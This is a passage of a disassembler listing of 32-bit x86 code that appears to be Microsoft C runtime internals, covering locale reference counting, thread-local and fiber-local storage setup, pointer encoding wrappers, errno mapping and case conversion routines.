xor eax, eax
loc_404D76: ; CODE XREF: sub_404C69+125�j
mov [ebp+var_1C], eax
cmp eax, 100h
jge short loc_404D90
mov cl, [eax+ebx+11Dh]
mov byte_423398[eax], cl
inc eax
jmp short loc_404D76
; ---------------------------------------------------------------------------
loc_404D90: ; CODE XREF: sub_404C69+115�j
push dword_423498
call ds:dword_41D1BC ; InterlockedDecrement
test eax, eax
jnz short loc_404DB3
mov eax, dword_423498
cmp eax, offset dword_423070
jz short loc_404DB3
push eax
call sub_403603
pop ecx
loc_404DB3: ; CODE XREF: sub_404C69+135�j
; sub_404C69+141�j
mov dword_423498, ebx
push ebx
call edi ; InterlockedIncrement
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_404DCA
jmp short loc_404DFA
sub_404C69 endp
; =============== S U B R O U T I N E =======================================
sub_404DCA proc near ; CODE XREF: sub_404C69+15A�p
; DATA XREF: .rdata:00421468�o
push 0Dh
call sub_40591F
pop ecx
retn
sub_404DCA endp
; ---------------------------------------------------------------------------
jmp short loc_404DFA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404C69
loc_404DD5: ; CODE XREF: sub_404C69+6A�j
cmp eax, 0FFFFFFFFh
jnz short loc_404DFA
cmp ebx, offset dword_423070
jz short loc_404DE9
push ebx
call sub_403603
pop ecx
loc_404DE9: ; CODE XREF: sub_404C69+177�j
call sub_4057D3
mov dword ptr [eax], 16h
jmp short loc_404DFA
; ---------------------------------------------------------------------------
loc_404DF6: ; CODE XREF: sub_404C69+30�j
and [ebp+var_20], 0
loc_404DFA: ; CODE XREF: sub_404C69+45�j
; sub_404C69+A1�j ...
mov eax, [ebp+var_20]
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_404C69
; =============== S U B R O U T I N E =======================================
sub_404E03 proc near ; CODE XREF: sub_40AB84+C�p
; sub_40ABE1+D�p ...
cmp dword_434DD4, 0
jnz short loc_404E1E
push 0FFFFFFFDh
call sub_404C69
pop ecx
mov dword_434DD4, 1
loc_404E1E: ; CODE XREF: sub_404E03+7�j
xor eax, eax
retn
sub_404E03 endp
; =============== S U B R O U T I N E =======================================
sub_404E21 proc near ; CODE XREF: sub_405073+31�p
; sub_4053B5+E8�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
mov eax, [esi+0BCh]
xor ebp, ebp
cmp eax, ebp
push edi
jz short loc_404EA4
cmp eax, offset off_423F38
jz short loc_404EA4
mov eax, [esi+0B0h]
cmp eax, ebp
jz short loc_404EA4
cmp [eax], ebp
jnz short loc_404EA4
mov eax, [esi+0B8h]
cmp eax, ebp
jz short loc_404E6B
cmp [eax], ebp
jnz short loc_404E6B
push eax
call sub_403603
push dword ptr [esi+0BCh]
call sub_40C704
pop ecx
pop ecx
loc_404E6B: ; CODE XREF: sub_404E21+31�j
; sub_404E21+35�j
mov eax, [esi+0B4h]
cmp eax, ebp
jz short loc_404E8C
cmp [eax], ebp
jnz short loc_404E8C
push eax
call sub_403603
push dword ptr [esi+0BCh]
call sub_40C6C4
pop ecx
pop ecx
loc_404E8C: ; CODE XREF: sub_404E21+52�j
; sub_404E21+56�j
push dword ptr [esi+0B0h]
call sub_403603
push dword ptr [esi+0BCh]
call sub_403603
pop ecx
pop ecx
loc_404EA4: ; CODE XREF: sub_404E21+12�j
; sub_404E21+19�j ...
mov eax, [esi+0C0h]
cmp eax, ebp
jz short loc_404EF2
cmp [eax], ebp
jnz short loc_404EF2
mov eax, [esi+0C4h]
sub eax, 0FEh
push eax
call sub_403603
mov eax, [esi+0CCh]
mov edi, 80h
sub eax, edi
push eax
call sub_403603
mov eax, [esi+0D0h]
sub eax, edi
push eax
call sub_403603
push dword ptr [esi+0C0h]
call sub_403603
add esp, 10h
loc_404EF2: ; CODE XREF: sub_404E21+8B�j
; sub_404E21+8F�j
lea edi, [esi+0D4h]
mov eax, [edi]
cmp eax, offset off_423E78
jz short loc_404F18
cmp [eax+0B4h], ebp
jnz short loc_404F18
push eax
call sub_40C534
push dword ptr [edi]
call sub_403603
pop ecx
pop ecx
loc_404F18: ; CODE XREF: sub_404E21+DE�j
; sub_404E21+E6�j
push 6
lea edi, [esi+50h]
pop ebx
loc_404F1E: ; CODE XREF: sub_404E21+132�j
cmp dword ptr [edi-8], offset dword_423598
jz short loc_404F38
mov eax, [edi]
cmp eax, ebp
jz short loc_404F38
cmp [eax], ebp
jnz short loc_404F38
push eax
call sub_403603
pop ecx
loc_404F38: ; CODE XREF: sub_404E21+104�j
; sub_404E21+10A�j ...
cmp [edi-4], ebp
jz short loc_404F4F
mov eax, [edi+4]
cmp eax, ebp
jz short loc_404F4F
cmp [eax], ebp
jnz short loc_404F4F
push eax
call sub_403603
pop ecx
loc_404F4F: ; CODE XREF: sub_404E21+11A�j
; sub_404E21+121�j ...
add edi, 10h
dec ebx
jnz short loc_404F1E
push esi
call sub_403603
pop ecx
pop edi
pop esi
pop ebp
pop ebx
retn
sub_404E21 endp
; =============== S U B R O U T I N E =======================================
sub_404F61 proc near ; CODE XREF: sub_405073+12�p
; sub_405266+93�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
push edi
mov edi, ds:dword_41D1B8
push esi
call edi ; InterlockedIncrement
mov eax, [esi+0B0h]
test eax, eax
jz short loc_404F7F
push eax
call edi ; InterlockedIncrement
loc_404F7F: ; CODE XREF: sub_404F61+19�j
mov eax, [esi+0B8h]
test eax, eax
jz short loc_404F8C
push eax
call edi ; InterlockedIncrement
loc_404F8C: ; CODE XREF: sub_404F61+26�j
mov eax, [esi+0B4h]
test eax, eax
jz short loc_404F99
push eax
call edi ; InterlockedIncrement
loc_404F99: ; CODE XREF: sub_404F61+33�j
mov eax, [esi+0C0h]
test eax, eax
jz short loc_404FA6
push eax
call edi ; InterlockedIncrement
loc_404FA6: ; CODE XREF: sub_404F61+40�j
push 6
lea ebx, [esi+50h]
pop ebp
loc_404FAC: ; CODE XREF: sub_404F61+71�j
cmp dword ptr [ebx-8], offset dword_423598
jz short loc_404FBE
mov eax, [ebx]
test eax, eax
jz short loc_404FBE
push eax
call edi ; InterlockedIncrement
loc_404FBE: ; CODE XREF: sub_404F61+52�j
; sub_404F61+58�j
cmp dword ptr [ebx-4], 0
jz short loc_404FCE
mov eax, [ebx+4]
test eax, eax
jz short loc_404FCE
push eax
call edi ; InterlockedIncrement
loc_404FCE: ; CODE XREF: sub_404F61+61�j
; sub_404F61+68�j
add ebx, 10h
dec ebp
jnz short loc_404FAC
mov eax, [esi+0D4h]
add eax, 0B4h
push eax
call edi ; InterlockedIncrement
pop edi
pop esi
pop ebp
pop ebx
retn
sub_404F61 endp
; =============== S U B R O U T I N E =======================================
sub_404FE7 proc near ; CODE XREF: sub_405073+1D�p
; sub_4053B5+CC�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40506F
push ebx
push ebp
push edi
mov edi, ds:dword_41D1BC
push esi
call edi ; InterlockedDecrement
mov eax, [esi+0B0h]
test eax, eax
jz short loc_405009
push eax
call edi ; InterlockedDecrement
loc_405009: ; CODE XREF: sub_404FE7+1D�j
mov eax, [esi+0B8h]
test eax, eax
jz short loc_405016
push eax
call edi ; InterlockedDecrement
loc_405016: ; CODE XREF: sub_404FE7+2A�j
mov eax, [esi+0B4h]
test eax, eax
jz short loc_405023
push eax
call edi ; InterlockedDecrement
loc_405023: ; CODE XREF: sub_404FE7+37�j
mov eax, [esi+0C0h]
test eax, eax
jz short loc_405030
push eax
call edi ; InterlockedDecrement
loc_405030: ; CODE XREF: sub_404FE7+44�j
push 6
lea ebx, [esi+50h]
pop ebp
loc_405036: ; CODE XREF: sub_404FE7+75�j
cmp dword ptr [ebx-8], offset dword_423598
jz short loc_405048
mov eax, [ebx]
test eax, eax
jz short loc_405048
push eax
call edi ; InterlockedDecrement
loc_405048: ; CODE XREF: sub_404FE7+56�j
; sub_404FE7+5C�j
cmp dword ptr [ebx-4], 0
jz short loc_405058
mov eax, [ebx+4]
test eax, eax
jz short loc_405058
push eax
call edi ; InterlockedDecrement
loc_405058: ; CODE XREF: sub_404FE7+65�j
; sub_404FE7+6C�j
add ebx, 10h
dec ebp
jnz short loc_405036
mov eax, [esi+0D4h]
add eax, 0B4h
push eax
call edi ; InterlockedDecrement
pop edi
pop ebp
pop ebx
loc_40506F: ; CODE XREF: sub_404FE7+7�j
mov eax, esi
pop esi
retn
sub_404FE7 endp
; =============== S U B R O U T I N E =======================================
sub_405073 proc near ; CODE XREF: sub_4050B1+54�p
test edi, edi
jz short loc_4050AE
test eax, eax
jz short loc_4050AE
push esi
mov esi, [eax]
cmp esi, edi
jz short loc_4050AA
push edi
mov [eax], edi
call sub_404F61
test esi, esi
pop ecx
jz short loc_4050AA
push esi
call sub_404FE7
cmp dword ptr [esi], 0
pop ecx
jnz short loc_4050AA
cmp esi, offset dword_4235A0
jz short loc_4050AA
push esi
call sub_404E21
pop ecx
loc_4050AA: ; CODE XREF: sub_405073+D�j
; sub_405073+1A�j ...
mov eax, edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4050AE: ; CODE XREF: sub_405073+2�j
; sub_405073+6�j
xor eax, eax
retn
sub_405073 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4050B1 proc near ; CODE XREF: sub_40271F+37�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_421470
call __SEH_prolog4
call sub_40539D
mov esi, eax
mov eax, dword_423594
test [esi+70h], eax
jz short loc_4050F0
cmp dword ptr [esi+6Ch], 0
jz short loc_4050F0
call sub_40539D
mov esi, [eax+6Ch]
loc_4050DC: ; CODE XREF: sub_4050B1+68�j
test esi, esi
jnz short loc_4050E8
push 20h
call sub_40785D
pop ecx
loc_4050E8: ; CODE XREF: sub_4050B1+2D�j
mov eax, esi
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_4050F0: ; CODE XREF: sub_4050B1+1B�j
; sub_4050B1+21�j
push 0Ch
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
lea eax, [esi+6Ch]
mov edi, off_423678
call sub_405073
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40511B
jmp short loc_4050DC
sub_4050B1 endp
; =============== S U B R O U T I N E =======================================
sub_40511B proc near ; CODE XREF: sub_4050B1+63�p
; DATA XREF: .rdata:00421488�o
push 0Ch
call sub_40591F
pop ecx
mov esi, [ebp-1Ch]
retn
sub_40511B endp
; =============== S U B R O U T I N E =======================================
sub_405127 proc near ; CODE XREF: sub_402D09+81�p
; sub_402D09+96�p ...
arg_0 = dword ptr 4
push esi
push dword_42368C
mov esi, ds:dword_41D184
call esi ; TlsGetValue
test eax, eax
jz short loc_40515B
mov eax, dword_423688
cmp eax, 0FFFFFFFFh
jz short loc_40515B
push eax
push dword_42368C
call esi ; TlsGetValue
call eax
test eax, eax
jz short loc_40515B
mov eax, [eax+1F8h]
jmp short loc_405176
; ---------------------------------------------------------------------------
loc_40515B: ; CODE XREF: sub_405127+11�j
; sub_405127+1B�j ...
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E4 ; GetModuleHandleA
test eax, eax
jz short loc_405184
push offset aEncodepointer ; "EncodePointer"
push eax
call ds:dword_41D0EC ; GetProcAddress
loc_405176: ; CODE XREF: sub_405127+32�j
test eax, eax
jz short loc_405184
push [esp+4+arg_0]
call eax
mov [esp+4+arg_0], eax
loc_405184: ; CODE XREF: sub_405127+41�j
; sub_405127+51�j
mov eax, [esp+4+arg_0]
pop esi
retn
sub_405127 endp
; =============== S U B R O U T I N E =======================================
sub_40518A proc near ; CODE XREF: sub_407B19+1�p
; sub_40B915+2F�p ...
push 0
call sub_405127
pop ecx
retn
sub_40518A endp
; =============== S U B R O U T I N E =======================================
sub_405193 proc near ; CODE XREF: sub_402D09+B�p
; sub_402D09+1C�p ...
arg_0 = dword ptr 4
push esi
push dword_42368C
mov esi, ds:dword_41D184
call esi ; TlsGetValue
test eax, eax
jz short loc_4051C7
mov eax, dword_423688
cmp eax, 0FFFFFFFFh
jz short loc_4051C7
push eax
push dword_42368C
call esi ; TlsGetValue
call eax
test eax, eax
jz short loc_4051C7
mov eax, [eax+1FCh]
jmp short loc_4051E2
; ---------------------------------------------------------------------------
loc_4051C7: ; CODE XREF: sub_405193+11�j
; sub_405193+1B�j ...
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E4 ; GetModuleHandleA
test eax, eax
jz short loc_4051F0
push offset aDecodepointer ; "DecodePointer"
push eax
call ds:dword_41D0EC ; GetProcAddress
loc_4051E2: ; CODE XREF: sub_405193+32�j
test eax, eax
jz short loc_4051F0
push [esp+4+arg_0]
call eax
mov [esp+4+arg_0], eax
loc_4051F0: ; CODE XREF: sub_405193+41�j
; sub_405193+51�j
mov eax, [esp+4+arg_0]
pop esi
retn
sub_405193 endp
; =============== S U B R O U T I N E =======================================
sub_4051F6 proc near ; DATA XREF: sub_4054D6+8A�o
; .data:off_425E04�o
call ds:dword_41D180 ; TlsAlloc
retn 4
sub_4051F6 endp
; =============== S U B R O U T I N E =======================================
sub_4051FF proc near ; CODE XREF: sub_40531A+A�p
push dword_42368C
call ds:dword_41D184 ; TlsGetValue
test eax, eax
jnz short locret_405228
push dword_425E08
call sub_405193
pop ecx
push eax
push dword_42368C
call ds:dword_41D17C ; TlsSetValue
locret_405228: ; CODE XREF: sub_4051FF+E�j
retn
sub_4051FF endp
; =============== S U B R O U T I N E =======================================
sub_405229 proc near ; CODE XREF: sub_4054D6+12�p
; sub_4054D6:loc_405650�p
mov eax, dword_423688
cmp eax, 0FFFFFFFFh
jz short loc_405249
push eax
push dword_425E10
call sub_405193
pop ecx
call eax
or dword_423688, 0FFFFFFFFh
loc_405249: ; CODE XREF: sub_405229+8�j
mov eax, dword_42368C
cmp eax, 0FFFFFFFFh
jz short loc_405261
push eax
call ds:dword_41D178 ; TlsFree
or dword_42368C, 0FFFFFFFFh
loc_405261: ; CODE XREF: sub_405229+28�j
jmp sub_4058CA
sub_405229 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405266 proc near ; CODE XREF: sub_40531A+59�p
; sub_4054D6+162�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 0Ch
push offset dword_421490
call __SEH_prolog4
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E4 ; GetModuleHandleA
mov [ebp+var_1C], eax
mov esi, [ebp+arg_0]
mov dword ptr [esi+5Ch], offset dword_423DC0
xor edi, edi
inc edi
mov [esi+14h], edi
test eax, eax
jz short loc_4052B8
push offset aEncodepointer ; "EncodePointer"
push eax
mov ebx, ds:dword_41D0EC
call ebx ; GetProcAddress
mov [esi+1F8h], eax
push offset aDecodepointer ; "DecodePointer"
push [ebp+var_1C]
call ebx ; GetProcAddress
mov [esi+1FCh], eax
loc_4052B8: ; CODE XREF: sub_405266+2C�j
mov [esi+70h], edi
mov byte ptr [esi+0C8h], 43h
mov byte ptr [esi+14Bh], 43h
mov eax, offset dword_423070
mov [esi+68h], eax
push eax
call ds:dword_41D1B8 ; InterlockedIncrement
push 0Ch
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+arg_4]
mov [esi+6Ch], eax
test eax, eax
jnz short loc_4052F6
mov eax, off_423678
mov [esi+6Ch], eax
loc_4052F6: ; CODE XREF: sub_405266+86�j
push dword ptr [esi+6Ch]
call sub_404F61
pop ecx
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_405311
call __SEH_epilog4
retn
sub_405266 endp
; =============== S U B R O U T I N E =======================================
sub_405311 proc near ; CODE XREF: sub_405266+A0�p
; DATA XREF: .rdata:004214A8�o
push 0Ch
call sub_40591F
pop ecx
retn
sub_405311 endp
; =============== S U B R O U T I N E =======================================
sub_40531A proc near ; CODE XREF: sub_40539D+1�p sub_4057D3�p ...
push esi
push edi
call ds:dword_41D0F0 ; RtlGetLastWin32Error
mov edi, eax
call sub_4051FF
push dword_423688
push dword_42368C
call ds:dword_41D184 ; TlsGetValue
call eax
mov esi, eax
test esi, esi
jnz short loc_405391
push 214h
push 1
call sub_40777A
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_405391
push esi
push dword_423688
push dword_425E0C
call sub_405193
pop ecx
call eax
test eax, eax
jz short loc_405388
push 0
push esi
call sub_405266
pop ecx
pop ecx
call ds:dword_41D0E0 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
jmp short loc_405391
; ---------------------------------------------------------------------------
loc_405388: ; CODE XREF: sub_40531A+54�j
push esi
call sub_403603
pop ecx
xor esi, esi
loc_405391: ; CODE XREF: sub_40531A+27�j
; sub_40531A+3B�j ...
push edi
call ds:dword_41D174 ; RtlRestoreLastWin32Error
pop edi
mov eax, esi
pop esi
retn
sub_40531A endp
; =============== S U B R O U T I N E =======================================
sub_40539D proc near ; CODE XREF: sub_40271F+F�p sub_403356�p ...
push esi
call sub_40531A
mov esi, eax
test esi, esi
jnz short loc_4053B1
push 10h
call sub_40785D
pop ecx
loc_4053B1: ; CODE XREF: sub_40539D+A�j
mov eax, esi
pop esi
retn
sub_40539D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053B5 proc near ; DATA XREF: sub_4054D6+115�o
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_4214B0
call __SEH_prolog4
mov esi, [ebp+arg_0]
test esi, esi
jz loc_4054B6
mov eax, [esi+24h]
test eax, eax
jz short loc_4053DA
push eax
call sub_403603
pop ecx
loc_4053DA: ; CODE XREF: sub_4053B5+1C�j
mov eax, [esi+2Ch]
test eax, eax
jz short loc_4053E8
push eax
call sub_403603
pop ecx
loc_4053E8: ; CODE XREF: sub_4053B5+2A�j
mov eax, [esi+34h]
test eax, eax
jz short loc_4053F6
push eax
call sub_403603
pop ecx
loc_4053F6: ; CODE XREF: sub_4053B5+38�j
mov eax, [esi+3Ch]
test eax, eax
jz short loc_405404
push eax
call sub_403603
pop ecx
loc_405404: ; CODE XREF: sub_4053B5+46�j
mov eax, [esi+44h]
test eax, eax
jz short loc_405412
push eax
call sub_403603
pop ecx
loc_405412: ; CODE XREF: sub_4053B5+54�j
mov eax, [esi+48h]
test eax, eax
jz short loc_405420
push eax
call sub_403603
pop ecx
loc_405420: ; CODE XREF: sub_4053B5+62�j
mov eax, [esi+5Ch]
cmp eax, offset dword_423DC0
jz short loc_405431
push eax
call sub_403603
pop ecx
loc_405431: ; CODE XREF: sub_4053B5+73�j
push 0Dh
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov edi, [esi+68h]
test edi, edi
jz short loc_40545E
push edi
call ds:dword_41D1BC ; InterlockedDecrement
test eax, eax
jnz short loc_40545E
cmp edi, offset dword_423070
jz short loc_40545E
push edi
call sub_403603
pop ecx
loc_40545E: ; CODE XREF: sub_4053B5+8D�j
; sub_4053B5+98�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4054C1
push 0Ch
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], 1
mov edi, [esi+6Ch]
test edi, edi
jz short loc_4054A3
push edi
call sub_404FE7
pop ecx
cmp edi, off_423678
jz short loc_4054A3
cmp edi, offset dword_4235A0
jz short loc_4054A3
cmp dword ptr [edi], 0
jnz short loc_4054A3
push edi
call sub_404E21
pop ecx
loc_4054A3: ; CODE XREF: sub_4053B5+C9�j
; sub_4053B5+D8�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4054CD
push esi
call sub_403603
pop ecx
loc_4054B6: ; CODE XREF: sub_4053B5+11�j
call __SEH_epilog4
retn 4
sub_4053B5 endp
; =============== S U B R O U T I N E =======================================
sub_4054BE proc near ; DATA XREF: .rdata:004214C8�o
mov esi, [ebp+8]
sub_4054BE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4054C1 proc near ; CODE XREF: sub_4053B5+B0�p
push 0Dh
call sub_40591F
pop ecx
retn
sub_4054C1 endp
; =============== S U B R O U T I N E =======================================
sub_4054CA proc near ; DATA XREF: .rdata:004214D4�o
mov esi, [ebp+8]
sub_4054CA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4054CD proc near ; CODE XREF: sub_4053B5+F5�p
push 0Ch
call sub_40591F
pop ecx
retn
sub_4054CD endp
; =============== S U B R O U T I N E =======================================
sub_4054D6 proc near ; CODE XREF: .text:loc_40401B�p
push edi
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E4 ; GetModuleHandleA
mov edi, eax
test edi, edi
jnz short loc_4054F1
call sub_405229
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_4054F1: ; CODE XREF: sub_4054D6+10�j
push esi
mov esi, ds:dword_41D0EC
push offset dword_41D4D4
push edi
call esi ; GetProcAddress
push offset aFlsgetvalue ; "FlsGetValue"
push edi
mov off_425E04, eax
call esi ; GetProcAddress
push offset aFlssetvalue ; "FlsSetValue"
push edi
mov dword_425E08, eax
call esi ; GetProcAddress
push offset aFlsfree ; "FlsFree"
push edi
mov dword_425E0C, eax
call esi ; GetProcAddress
cmp off_425E04, 0
mov esi, ds:dword_41D17C
mov dword_425E10, eax
jz short loc_405551
cmp dword_425E08, 0
jz short loc_405551
cmp dword_425E0C, 0
jz short loc_405551
test eax, eax
jnz short loc_405575
loc_405551: ; CODE XREF: sub_4054D6+63�j
; sub_4054D6+6C�j ...
mov eax, ds:dword_41D184
mov dword_425E08, eax
mov eax, ds:dword_41D178
mov off_425E04, offset sub_4051F6
mov dword_425E0C, esi
mov dword_425E10, eax
loc_405575: ; CODE XREF: sub_4054D6+79�j
call ds:dword_41D180 ; TlsAlloc
cmp eax, 0FFFFFFFFh
mov dword_42368C, eax
jz loc_405655
push dword_425E08
push eax
call esi ; TlsSetValue
test eax, eax
jz loc_405655
call sub_407B19
push off_425E04
call sub_405127
push dword_425E08
mov off_425E04, eax
call sub_405127
push dword_425E0C
mov dword_425E08, eax
call sub_405127
push dword_425E10
mov dword_425E0C, eax
call sub_405127
add esp, 10h
mov dword_425E10, eax
call sub_405881
test eax, eax
jz short loc_405650
push offset sub_4053B5
push off_425E04
call sub_405193
pop ecx
call eax ; TlsFree
cmp eax, 0FFFFFFFFh
mov dword_423688, eax
jz short loc_405650
push 214h
push 1
call sub_40777A
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_405650
push esi
push dword_423688
push dword_425E0C
call sub_405193
pop ecx
call eax ; TlsFree
test eax, eax
jz short loc_405650
push 0
push esi
call sub_405266
pop ecx
pop ecx
call ds:dword_41D0E0 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
xor eax, eax
inc eax
jmp short loc_405657
; ---------------------------------------------------------------------------
loc_405650: ; CODE XREF: sub_4054D6+113�j
; sub_4054D6+130�j ...
call sub_405229
loc_405655: ; CODE XREF: sub_4054D6+AD�j
; sub_4054D6+BE�j
xor eax, eax
loc_405657: ; CODE XREF: sub_4054D6+178�j
pop esi
pop edi
retn
sub_4054D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40565A proc near ; CODE XREF: sub_4027D6+9B�p
; sub_4027D6+AD�p ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push [ebp+arg_4]
lea ecx, [ebp+var_18]
call sub_40271F
mov ebx, [ebp+arg_0]
mov esi, 100h
cmp ebx, esi
jnb short loc_4056CD
mov ecx, [ebp+var_18]
cmp dword ptr [ecx+0ACh], 1
jle short loc_405699
lea eax, [ebp+var_18]
push eax
push 1
push ebx
call sub_40CA44
mov ecx, [ebp+var_18]
add esp, 0Ch
jmp short loc_4056A6
; ---------------------------------------------------------------------------
loc_405699: ; CODE XREF: sub_40565A+29�j
mov eax, [ecx+0C8h]
movzx eax, byte ptr [eax+ebx*2]
and eax, 1
loc_4056A6: ; CODE XREF: sub_40565A+3D�j
test eax, eax
jz short loc_4056B9
mov eax, [ecx+0CCh]
movzx eax, byte ptr [eax+ebx]
jmp loc_405760
; ---------------------------------------------------------------------------
loc_4056B9: ; CODE XREF: sub_40565A+4E�j
; sub_40565A+EA�j
cmp [ebp+var_C], 0
jz short loc_4056C6
mov eax, [ebp+var_10]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4056C6: ; CODE XREF: sub_40565A+63�j
mov eax, ebx
jmp loc_40576D
; ---------------------------------------------------------------------------
loc_4056CD: ; CODE XREF: sub_40565A+1D�j
mov eax, [ebp+var_18]
cmp dword ptr [eax+0ACh], 1
jle short loc_40570A
mov [ebp+arg_0], ebx
sar [ebp+arg_0], 8
lea eax, [ebp+var_18]
push eax
mov eax, [ebp+arg_0]
and eax, 0FFh
push eax
call sub_40CA00
test eax, eax
pop ecx
pop ecx
jz short loc_40570A
mov al, byte ptr [ebp+arg_0]
push 2
mov [ebp+var_4], al
mov [ebp+var_3], bl
mov [ebp+var_2], 0
pop ecx
jmp short loc_40571F
; ---------------------------------------------------------------------------
loc_40570A: ; CODE XREF: sub_40565A+7D�j
; sub_40565A+9C�j
call sub_4057D3
mov dword ptr [eax], 2Ah
xor ecx, ecx
mov [ebp+var_4], bl
mov [ebp+var_3], 0
inc ecx
loc_40571F: ; CODE XREF: sub_40565A+AE�j
mov eax, [ebp+var_18]
push 1
push dword ptr [eax+4]
lea edx, [ebp+var_8]
push 3
push edx
push ecx
lea ecx, [ebp+var_4]
push ecx
push esi
push dword ptr [eax+14h]
lea eax, [ebp+var_18]
push eax
call sub_40C2F9
add esp, 24h
test eax, eax
jz loc_4056B9
cmp eax, 1
jnz short loc_405755
movzx eax, [ebp+var_8]
jmp short loc_405760
; ---------------------------------------------------------------------------
loc_405755: ; CODE XREF: sub_40565A+F3�j
movzx ecx, [ebp+var_7]
xor eax, eax
mov ah, [ebp+var_8]
or eax, ecx
loc_405760: ; CODE XREF: sub_40565A+5A�j
; sub_40565A+F9�j
cmp [ebp+var_C], 0
jz short loc_40576D
mov ecx, [ebp+var_10]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_40576D: ; CODE XREF: sub_40565A+6E�j
; sub_40565A+10A�j
pop esi
pop ebx
leave
retn
sub_40565A endp
; =============== S U B R O U T I N E =======================================
sub_405771 proc near ; CODE XREF: sub_4108BD+19�p
; sub_4108BD+36�p
arg_0 = dword ptr 4
cmp dword_425DE0, 0
jnz short loc_40578A
mov eax, [esp+arg_0]
lea ecx, [eax-41h]
cmp ecx, 19h
ja short locret_405797
add eax, 20h
retn
; ---------------------------------------------------------------------------
loc_40578A: ; CODE XREF: sub_405771+7�j
push 0
push [esp+4+arg_0]
call sub_40565A
pop ecx
pop ecx
locret_405797: ; CODE XREF: sub_405771+13�j
retn
sub_405771 endp
; =============== S U B R O U T I N E =======================================
sub_405798 proc near ; CODE XREF: sub_403603+80�p
; sub_4057F9+D�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_40579E: ; CODE XREF: sub_405798+13�j
cmp eax, dword_423690[ecx*8]
jz short loc_4057B9
inc ecx
cmp ecx, 2Dh
jl short loc_40579E
lea ecx, [eax-13h]
cmp ecx, 11h
ja short loc_4057C1
push 0Dh
pop eax
retn
; ---------------------------------------------------------------------------
loc_4057B9: ; CODE XREF: sub_405798+D�j
mov eax, dword_423694[ecx*8]
retn
; ---------------------------------------------------------------------------
loc_4057C1: ; CODE XREF: sub_405798+1B�j
add eax, 0FFFFFF44h
push 0Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 8
retn
sub_405798 endp
; =============== S U B R O U T I N E =======================================
sub_4057D3 proc near ; CODE XREF: sub_4027D6+19�p
; sub_4027D6+4F�p ...
call sub_40531A
test eax, eax
jnz short loc_4057E2
mov eax, offset dword_4237F8
retn
; ---------------------------------------------------------------------------
loc_4057E2: ; CODE XREF: sub_4057D3+7�j
add eax, 8
retn
sub_4057D3 endp
; =============== S U B R O U T I N E =======================================
sub_4057E6 proc near ; CODE XREF: sub_4057F9+1�p
; sub_408AE1+14�p ...
call sub_40531A
test eax, eax
jnz short loc_4057F5
mov eax, offset dword_4237FC
retn
; ---------------------------------------------------------------------------
loc_4057F5: ; CODE XREF: sub_4057E6+7�j
add eax, 0Ch
retn
sub_4057E6 endp
; =============== S U B R O U T I N E =======================================
sub_4057F9 proc near ; CODE XREF: sub_408A4D+84�p
; sub_409DAD+3FB�p ...
arg_0 = dword ptr 4
push esi
call sub_4057E6
mov ecx, [esp+4+arg_0]
push ecx
mov [eax], ecx
call sub_405798
pop ecx
mov esi, eax
call sub_4057D3
mov [eax], esi
pop esi
retn
sub_4057F9 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405820 proc near ; CODE XREF: sub_4028F9+9A�p
; sub_4029E9+42�j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
or ecx, ecx
jz short loc_40587A
mov esi, [ebp+arg_0]
